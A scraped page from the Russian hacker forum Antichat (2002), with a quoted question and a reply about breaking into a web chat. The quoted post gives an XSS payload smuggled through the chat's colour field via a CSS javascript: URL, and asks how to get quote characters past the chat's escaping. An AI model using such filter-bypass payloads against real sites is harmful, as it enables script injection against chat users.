HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Чаты
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #16  
Старый 06.06.2002, 02:59
mifan
Познающий
Регистрация: 27.05.2002
Сообщений: 80
С нами: 12606887

Репутация: 28
По умолчанию

</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (Guest @ июня 05 2002,17:16)</td></tr><tr><td id="QUOTE">Предыдущее общение можно стереть (я дурак)...

Вопросик, хочу написать скарипт посложнее...
Вот такой вот работает (через цвет):
цвет=&quot;background-image:url(javascript:document.write(unescape('%3C' )+'script'+unescape('%3E')+'alert()'+';'+'alert()' +unescape('%3C')+'/script'+unescape('%3E') ))&quot;&quot;

В чате он превращается в
color:;background-image:url(javascript:document.write(unescape(&amp; #39;%3C&amp;#39;)+&amp;#39;script&amp;#39;+unescap e(&amp;#39;%3E&amp;#39;)+&amp;#39;alert()&amp;#39; +&amp;#39;;&amp;#39;+&amp;#39;alert()&amp;#39;+une scape(&amp;#39;%3C&amp;#39;)+&amp;#39;/script&amp;#39;+unescape(&amp;#39;%3E&amp;#39;) ));

Но все равно работает. Но вот когда я забиваю внутрь alert
что нибудь типа alert ('kkk') то он преврfщается в неисполнимый (т.е. ' чат внутри алерта меняет на &amp;#39) и скрипт не испольняется. Как быть не подскажите?[/QUOTE]<span id='postcolor'>
можетЪ я тупой, но как этот вонючий чат можно взломать через цвет если максимум можно вписать только 30 символов??????????????
 
 



Предыдущая тема Следующая тема

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.